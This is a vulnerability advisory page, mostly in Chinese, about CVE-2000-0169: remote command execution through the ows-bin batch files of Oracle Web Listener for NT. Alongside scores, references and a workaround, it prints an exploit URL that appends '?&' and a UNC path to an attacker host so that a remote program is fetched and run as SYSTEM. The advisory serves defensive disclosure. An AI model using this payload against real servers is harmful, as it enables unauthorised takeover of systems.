CVE-2000-0169
CVSS7.5
发布时间 :2000-03-15 00:00:00
修订时间 :2008-09-10 15:03:08
NMCOE    

[原文]Batch files in the Oracle web listener ows-bin directory allow remote attackers to execute commands via a malformed URL that includes '?&'.


[CNNVD]Oracle Web Listener批处理文件可用来远程执行任意命令漏洞(CNNVD-200003-032)

        
        Oracle WebServer是一个与Oracle7 Server紧密集成的HTTP服务器,能够由存储在Oracle数据库的数据建立动态HTML文件。Oracle Web Listener是其组件之一,接收使用任何浏览器的用户发出的请求。对于静态(基于文件的)页面请求被监听进程立即处理,其功能即是一个HTTP服务器。
        Oracle Web Listener for NT在安装了OAS后,缺省设置下,/ows-bin目录(映射到C:\orant\ows\4.0\bin)下安装了一些批处理文件,这些文件能被攻击者用来在服务器上执行任意命令。
        攻击者只需要在批处理文件的后面增加"?&"字符串,以及要执行的命令即可。这些命令将
        在"SYSTEM"级别运行。攻击者甚至不需要知道确切的批处理文件的名称,用'*'通配符就可以匹配目录下所有的批处理文件。
        另外,攻击者也可以用UNC(Universal Naming Conversion)路径(例如:\\attacker.com\getadmin.exe)下载并执行远程主机上的程序。
        <*链接:http://www.cerberus-infosec.co.uk/advisories.shtml
        *>

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0169
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0169
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-032
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1053
(UNKNOWN)  BID  1053
http://archives.neohapsis.com/archives/ntbugtraq/2000-q1/0211.html
(UNKNOWN)  NTBUGTRAQ  20000314 Oracle Web Listener 4.0.x

- 漏洞信息

Oracle Web Listener批处理文件可用来远程执行任意命令漏洞
高危 输入验证
2000-03-15 00:00:00 2006-04-07 00:00:00
远程※本地  
        
        Oracle WebServer是一个与Oracle7 Server紧密集成的HTTP服务器,能够由存储在Oracle数据库的数据建立动态HTML文件。Oracle Web Listener是其组件之一,接收使用任何浏览器的用户发出的请求。对于静态(基于文件的)页面请求被监听进程立即处理,其功能即是一个HTTP服务器。
        Oracle Web Listener for NT在安装了OAS后,缺省设置下,/ows-bin目录(映射到C:\orant\ows\4.0\bin)下安装了一些批处理文件,这些文件能被攻击者用来在服务器上执行任意命令。
        攻击者只需要在批处理文件的后面增加"?&"字符串,以及要执行的命令即可。这些命令将
        在"SYSTEM"级别运行。攻击者甚至不需要知道确切的批处理文件的名称,用'*'通配符就可以匹配目录下所有的批处理文件。
        另外,攻击者也可以用UNC(Universal Naming Conversion)路径(例如:\\attacker.com\getadmin.exe)下载并执行远程主机上的程序。
        <*链接:http://www.cerberus-infosec.co.uk/advisories.shtml
        *>

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 删除或者禁用ows-bin目录。
        厂商补丁:
        Oracle
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.oracle.com

- 漏洞信息 (19809)

Oracle Web Listener 4.0 .x for NT Batch File Vulnerability (EDBID:19809)
windows remote
2000-03-15 Verified
0 Cerberus Security Team
N/A [点击下载]
source: http://www.securityfocus.com/bid/1053/info

Oracle Web Listener for NT makes use of various batch files as cgi scripts, which are stored in the /ows-bin/ directory by default. 

Any of these batch files can be used to run arbitrary commands on the server, simply by appending '?&' and a command to the filename. The command will be run at the SYSTEM level. The name of a batch file is not even neccessary, as it will translate the '*' character and apply the appended string to every batch file in the directory. Moreover, UNC paths can be used to cause the server to download and execute remote code.

http: //target/ows-bin/*.bat?&\\attacker\getadmin.bat		

- 漏洞信息

264
Oracle Web Listener /ows-bin/ Directory Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Workaround
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

This host is running the 'Oracle Web Listener'. Web Listener is a component of the Oracle Application Server. The Web Listener contains a flaw that allows an attacker to execute arbitrary commands on this host. An attacker can use this to gain access to this host.

- 时间线

2000-03-15 Unknow
Unknow Unknow

- 解决方案

Disable the Oracle Web Listener if it's not required. If it is required, remove an extraneous batch files from the ows-bin CGI-BIN directory.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站